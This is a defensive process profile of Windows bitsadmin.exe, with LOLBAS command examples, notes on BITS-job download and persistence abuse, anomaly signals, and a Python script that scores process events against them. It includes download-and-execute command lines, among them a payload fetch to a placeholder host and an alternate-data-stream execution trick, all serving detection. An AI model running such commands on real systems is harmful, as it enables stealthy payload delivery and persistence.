bitsadmin.exe

bitsadmin.exe is a command-line tool for creating and managing BITS (Background Intelligent Transfer Service) jobs, which download or upload files in the background through a Windows service. Windows Update and many installers rely on BITS to fetch data resiliently. Microsoft has deprecated bitsadmin in favor of PowerShell, but attackers still use it to download payloads and to run a command when a transfer finishes.

File identity

File details

Not observed.

Signing information

Not observed.

File version

Not observed.

File size

Not observed.

Execution context

File paths

Not observed.

User context

Not observed.

Integrity level

Not observed.

Instances

Not observed.

Session

Not observed.

Token privileges

Not observed.

Ancestry

Parents

Not observed.

Children

Not observed.

Grandparents

Not observed.

Grandchildren

Not observed.

Behavior

Loaded modules

Not observed.

Named pipes

Not observed.

Process handles

Not observed.

Command-line patterns

Not observed.

LOLBAS (4)
  • bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 (ADS): Performs execution of the specified file from an alternate data stream; can be used as a defensive evasion or persistence technique.
  • bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 (Download): Download a file from the Internet.
  • bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset (Copy): Copy a file.
  • bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset (Execute): Execute the specified binary. Can be used as a defensive evasion.

Indicators

Hashes

Not observed.

Analysis

About this process

bitsadmin.exe drives the Background Intelligent Transfer Service, the Windows component that moves files in the background using spare bandwidth and survives reboots and dropped connections. BITS is the machinery behind much of Windows Update and software delivery. The genuine binary lives at C:\Windows\System32\bitsadmin.exe. Microsoft deprecated it in favour of the PowerShell BITS cmdlets (Start-BitsTransfer), so newer scripts increasingly use those instead.

A job is built up in steps: /create makes it, /addfile attaches a source URL and a local destination, and /resume starts the transfer. Two details matter for triage. The transfer itself is carried out by the BITS service inside svchost.exe, not by bitsadmin, so the network connection comes from the service rather than the tool. And /SetNotifyCmdLine attaches a command that BITS runs when the job completes.

Legitimately, bitsadmin is uncommon on a normal desktop, because the BITS service does its work without anyone invoking the command-line tool. Its parent and the job it builds on the command line are what give an instance meaning.

Security notes

bitsadmin.exe is a stealthy download tool (T1105, T1197). A line like bitsadmin /transfer job https://host/payload C:\Users\Public\p.exe pulls a file through the BITS service, which blends with normal update traffic and resumes across reboots. Crucially, the connection is made by svchost.exe hosting BITS, not by bitsadmin, so a network-centric view misses the origin entirely.

Its real signature technique is BITS Jobs (T1197). /SetNotifyCmdLine tells BITS to run a program when a job finishes, which lets an attacker chain a download to execution, or stand up a long-lived or recurring job as persistence that re-runs their command. The job lives in the BITS database rather than an obvious autostart location, so it survives reboots and evades the usual persistence checks.

In every case the binary is the genuine signed bitsadmin, the work hides behind a legitimate background service, and the activity resembles an ordinary update. The command-line verbs (/transfer, /addfile, /SetNotifyCmdLine) and the parent are where the intent shows.

Anomaly signals (6)
  • Image path other than C:\Windows\System32\bitsadmin.exe (high)
  • /transfer or /addfile with an http/https URL (high)
  • /SetNotifyCmdLine attaching a command to a job (high)
  • Parent is an Office application, cmd.exe, powershell.exe, wscript.exe, cscript.exe, or mshta.exe (high)
  • A job downloading to a user-writable path (Temp, AppData, Downloads) (high)
  • Long-lived, suspended, or oddly named BITS jobs left on the system (med)
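The security notes and the anomaly signals above reduce to a handful of checks on a process-creation event: the image path, the command-line verbs, the presence of a URL or a user-writable destination, and the parent. The following triage script is an added example, not part of this profile or of any vendor tooling; it encodes those checks over constructed events. The Office parent names (WINWORD, EXCEL, POWERPNT, OUTLOOK) are an assumption, since the profile only says "Office application", and the hostnames in the sample command lines are placeholders.

```python
"""Triage bitsadmin.exe process-creation events against the profile's anomaly signals."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Expected image path of the genuine binary (compared case-insensitively).
GENUINE_IMAGE = r"c:\windows\system32\bitsadmin.exe"

# High-signal parents from the profile. The Office executable names are an
# assumption on my part; the profile itself only says "an Office application".
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Destination directories the profile calls user-writable (Temp, AppData, Downloads).
USER_WRITABLE_RE = re.compile(r"\\(?:temp|appdata|downloads)\\", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the executable that started
    command_line: str
    parent_image: str   # full path of the parent process


@dataclass(frozen=True)
class Finding:
    signal: str
    severity: str


def score_bitsadmin_event(ev: ProcessEvent) -> list[Finding]:
    """Return one Finding per anomaly signal the event matches, in profile order."""
    findings: list[Finding] = []
    cl = ev.command_line
    cl_lower = cl.lower()
    builds_transfer = "/transfer" in cl_lower or "/addfile" in cl_lower

    if ev.image.lower() != GENUINE_IMAGE:
        findings.append(Finding("image path other than System32\\bitsadmin.exe", "high"))
    if builds_transfer and URL_RE.search(cl):
        findings.append(Finding("/transfer or /addfile with an http/https URL", "high"))
    if "/setnotifycmdline" in cl_lower:
        findings.append(Finding("/SetNotifyCmdLine attaching a command to a job", "high"))
    parent_name = ev.parent_image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if parent_name in SUSPICIOUS_PARENTS:
        findings.append(Finding(f"parent is {parent_name}", "high"))
    if builds_transfer and USER_WRITABLE_RE.search(cl):
        findings.append(Finding("job downloading to a user-writable path", "high"))
    return findings


def triage(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Map each event's command line to the names of the signals it tripped."""
    return [(ev.command_line, [f.signal for f in score_bitsadmin_event(ev)]) for ev in events]


# Constructed sample events, not real telemetry; host.invalid is a placeholder.
SAMPLE_EVENTS = [
    # An administrator listing jobs from a vendor updater: nothing to flag.
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe",
                 "bitsadmin /list /allusers",
                 r"C:\Program Files\ExampleVendor\updater.exe"),
    # The download pattern from the security notes, spawned by PowerShell.
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe",
                 r"bitsadmin /transfer job https://host.invalid/payload C:\Users\alice\AppData\Local\Temp\p.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    # A completion command attached to a job, from a cmd.exe parent.
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe",
                 r"bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL",
                 r"C:\Windows\System32\cmd.exe"),
    # A copy of the binary running from outside System32.
    ProcessEvent(r"C:\Users\alice\Downloads\bitsadmin.exe",
                 "bitsadmin /resume 1",
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for cmdline, signals in triage(SAMPLE_EVENTS):
        print(f"{len(signals)} signal(s): {cmdline}")
        for s in signals:
            print("   -", s)
```

The checks look only at the bitsadmin event itself. As the notes say, the network connection for the job appears on the svchost.exe instance hosting BITS, so a rule that joins the two needs the job name or destination path from this command line as the pivot, and the medium-severity "lingering jobs" signal is a host-side inventory check rather than something a single process event can show.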

Telemetry

OS prevalence

Not observed.

Observation timeline

Not observed.

References
